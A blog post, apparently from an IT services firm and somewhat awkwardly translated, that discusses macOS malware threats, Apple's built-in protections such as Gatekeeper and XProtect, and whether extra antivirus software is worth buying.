Cyberattacks on macOS - Additional antivirus software necessary?

Cyber attacks have enormous damage potential. They endanger the existence of companies and, in the case of attacks on critical Infrastructures such as hospitals or energy supply companies quickly have a serious impact on the population. Apple is considered secure: But is macOS really immune to cyberattacks? Is often paid antivirus software a must for additional protection or just a superfluous expense?

In recent years, the frequency and intensity of cyber attacks, for example by means of ransomware or DDoS, has increased significantly. The risk of attacks by highly professional and globally networked perpetrators is growing, making the Security of our digital devices is at the top of the worry list. Apple fans are often proud to use macOS, an operating system known for its high standards and reliability.

In this blog post, we'll take a closer look at the question of whether additional antivirus software for macOS is really necessary, or if it's just a money-making strategy. We will explore the risks, the current threats and the different views on the subject to help you make an informed decision about protecting your macOS operating system.

What is a cyber attack?

Cyber attack what is it

A cyberattack - also called a cyberattack - is a targeted and malicious act that uses digital technologies and networks to access computer systems, data, or infrastructures and make them

  • to disturb,
  • to damage,
  • manipulate or
  • to steal.

Cyberattacks can be carried out by individuals, criminal groups, state actors, or other attackers and have the potential to cause significant damage.

Cyberattacks take a variety of forms, including malware infections, phishing attempts, denial-of-service (DDoS) attacks, data leaks and other tactics, which we discussed in our blogpost What cybercrime means describe in more detail.

Cyberattacks on macOS observed by Bitdefender

Cybercriminals are not only targeting Windows users, but also macOS device owners. Trojans, potentially unwanted applications (PUA) and adware can also appear on macOS hardware. Although Windows is still more frequently attacked, Apple has nevertheless had to proactively close vulnerabilities in its operating system, Bitdefender reported in August 2023. Bitdefender Labs analyzed global data for the threat landscape of macOS systems in 2022.

The results show that Apple hardware is targeted less, but still by cybercriminals, while Windows and Android devices are more attractive to hackers due to their wider distribution.

The main threats to macOS are cyberattacks in the form of Trojans at 51.8 %, potentially unwanted applications (PUA) at 25.3 %, and adware at 22.6 %.

Although devices running macOS are attacked less frequently than Windows computers, they are not immune to malware. Apple had to close security gaps because hackers use social engineering and automated attack techniques to attack macOS users. At the same time, professional spyware vendors are becoming active on iOS and macOS hardware. Systems share many key components with macOS, such as the Web rendering engine WebKit. Apple has released security updates for critical vulnerabilities, but attacks on macOS hardware are still becoming more efficient. Negligent updates and poor cybersecurity practices by Mac users make criminals' jobs easier.

Trojans are a risk factor and attack systems that are not updated. Neglecting updates poses a concrete danger. Attackers use social engineering via spam, phishing, social media, malvertising or manipulated file downloads via torrent or warez websites.

Cyberattacks specifically designed for macOS often require the victim to manually launch an executable. Therefore, it is important for cybercriminals to make their malware look like a legitimate application.

One in four threats to macOS is a potentially unwanted application (PUA). Hackers distribute PUAs as freeware, repackaged applications, or utilities (e.g., remote administration, system cleanup, supposed virus scanners, power-saving apps, and disk space management) that can secretly record data or perform cryptomining (8 % of PUAs are cryptominer).

Apple users should not assume that their macOS hardware is safe, even if it is attacked less frequently. A dedicated cybersecurity solution, regular updates and caution with suspicious content are necessary. Downloading files from unofficial sources such as torrents or warez should be avoided.

Connection between cyber attacks and macOS

Cyber attacks macOS context

Especially in recent years, the number of cyberattacks targeting the macOS operating system has increased. Previously, Macs were less targeted by malware authors because Windows systems were a more attractive target due to their prevalence. However, with the rising popularity of Macs, they have become increasingly interesting for cybercriminals.

Security mechanisms such as Gatekeeper and XProtect are vulnerable

Security holes and vulnerabilities are exploited by attackers to install malware or gain access to the system. Macs have certain security mechanisms inherently, such as Gatekeeper and XProtect, but they do not provide absolute security.

Phishing and social engineering

Many cyberattacks on Mac users occur via phishing emails or fake websites designed to steal sensitive information such as passwords or credit card details. These attacks often target the user's weakness rather than the macOS operating system directly.

Mac malware

There are special malware and viruses developed for macOS. Examples of this are Mac Trojans such as Flashback and MacKeeper. This malware causes significant damage to Mac systems once they are infected.

Cybercrime and financial motivation

Attackers often have financial goals - and Apple has a high-priced product strategy. If cybercriminals determine that Mac users are stereotypically potentially lucrative targets, they will systematically try to carry out cyberattacks specifically tailored to this - possibly "well-heeled" - target group.

So, all in all, it shows that Mac users are not completely immune to cyberattacks despite the general security benefits of macOS.

It is therefore important to take appropriate security measures on Mac systems as well. These include regular software updates, the use of antivirus software and a healthy caution towards suspicious emails and websites.

What Apple says about macOS security

"Apple operating system design focuses on security. The design includes a hardware trust anchor that enables secure boot and a secure process for software updates. Apple operating systems also use purpose-built chip-based hardware features that protect against exploits during system operation."

Apple Support

Integrity of the operating system

The built-in features in macOS serve to preserve the integrity of trusted code during its execution. In short, Apple operating systems help defend against attacks, misuse, and sabotage attempts, whether they originate from apps, the Internet, or other sources. These protections are available on devices with supported Apple chips, which includes iOS, iPadOS, tvOS, watchOS, and now macOS on Mac computers with Apple chips:

Cyber attacks macOS integrated functions operating system
Source: Apple Support

Note: The PPL (Page Protection Layer) requires that the platform only executes signed and trusted code. This security model is not applicable for macOS.

Protection against malware with macOS

Apple runs a threat analysis process that quickly detects and blocks malware.

3 levels of defense against malware cyber attacks

The fight against malware is organized in 3 steps in macOS:

  1. Preventing the launch or execution of malware: App Store or Gatekeeper in combination with authentication
  2. Blocking the execution of malware on customer systems: Gatekeeper, Authentication and XProtect
  3. Removal and cleanup of executed malware: XProtect

These first two levels of defense aim to prevent the spread of malware and block its execution, while the third level aims to remove malware that may already be active.

Together - according to Apple's position - these defenses provide comprehensive protection against viruses and malware. Furthermore, additional security measures are available on Mac systems with Apple chips that are capable of limiting the potential damage from executed malware.

Apple Malware Verification Service Authentication

Authentication is a service from Apple that is used to check malware in macOS apps. Developers who want to offer their apps outside the App Store must submit them for verification in advance. Apple scans this software for known malware threats and issues a certification ticket if no malware is found. Usually, developers add this authentication ticket to their app so that Gatekeeper (= influencer that takes an important position in a decision-making process) can verify and run it, even if the device is offline.

In addition, Apple can issue blocking tickets for apps that are detected as malicious, even if they have been previously certified. The macOS operating system regularly checks for new blocking tickets so that the gatekeeper always has up-to-date information and blocks the launch of such apps - at best in time. This process makes it possible to react quickly to malicious apps, since background updates are performed much more frequently than updates for new XProtect signatures.

XProtect for macOS is supposed to protect against cyber attacks

MacOS has built-in antivirus technology called XProtect that detects and removes malware based on signatures. These signatures are regularly updated by Apple and are based on YARA, a tool for signature-based malware detection. Apple constantly monitors new malware threats and, as of today (09/2023), updates signatures automatically without requiring system updates to protect Macs running macOS from malware. XProtect automatically detects and blocks the installation of unknown malware.

In macOS 10.15 and newer versions, XProtect checks known malicious content whenever

  • an app is launched for the first time,
  • if an app has been changed in the file system or
  • when XProtect signatures have been updated.

If XProtect detects known malware, the app is blocked, the user is notified and should subsequently move the app to the trash.

According to Apple, the authentication effectively protects against known files or file hashes and can also be applied to apps that are already open. XProtect's signature-based rules can also detect variants of malware that are not yet known.

XProtect only scans apps that have been modified or are launched for the first time.

Apple Support

Nevertheless, in case malware appears on a Mac, XProtect offers the possibility of cleaning it up. It includes an engine that cleans up malicious infections due to automatic Apple updates that are part of the system data files and security updates. XProtect removes malware as soon as updated information is available and regularly monitors for infections. Note that XProtect does not automatically restart Apple hardware.

Automatic XProtect security updates

Apple automatically releases updates for XProtect based on the latest information about current threats. By default, macOS checks for such updates on a daily basis. Authentication updates are deployed via CloudKit synchronization and occur much more frequently.

Apple's response to the discovery of new malware

When new malware is detected, several steps are possible:

  1. The developer certificates associated with the malware are revoked.
  2. Authentication issues blocking tickets for all files (apps and associated files) related to the malware.
  3. XProtect signatures are developed and published to enable detection of the malware.

These signatures are also applied to already authenticated software to ensure that apps already installed are also scanned for malware. Malware detection then initiates a series of actions over the next seconds, hours, and days to ensure the best possible protections for Mac users.

Prevention protects better against cyber attacks than additional antivirus software

As in all new fraud scenarios, the best protection lies in prevention. Security teams should constantly review and update technical and organizational security measures in the enterprise to keep pace with the ongoing innovations of cybercriminals. The use of AI-based threat analysis tools and risk assessments helps to minimize risk in advance using technical solutions.

At the same time, it is important to educate employees about current attack tactics, increase their awareness of them, and provide them with Tools to detect, report, and defend against attacks. The same applies to the security teams themselves: Through regular training, they can continuously reduce security risks and respond quickly in the event of an attack, despite all security precautions (Source: 2023 Cyber Attacks Report by SoSafe).

Conclusion - cyber attacks on macOS operating system

The question of whether additional antivirus software on macOS is necessary or pure money-making by the respective providers is complex and requires a differentiated view. Although the macOS operating system is considered more secure than some other operating systems, it is not completely immune to attacks. In recent years, more cyberattacks on macOS devices have been observed: A clear indication that these Platform is also at risk.

Overall, the decision for or against additional antivirus software on macOS depends on various factors. While macOS has some built-in security mechanisms, additional security solutions can be useful in certain scenarios, especially when users' behavior puts them at a higher risk for cyberattacks. Ultimately, the decision should be based on an informed risk assessment and the individual needs and habits of the user.

Do you have questions about cyberattacks or antivirus software for macOS?

Write us a message. Our experts will contact you in a timely manner.

    Charlotte Goetz Avatar

    Latest articles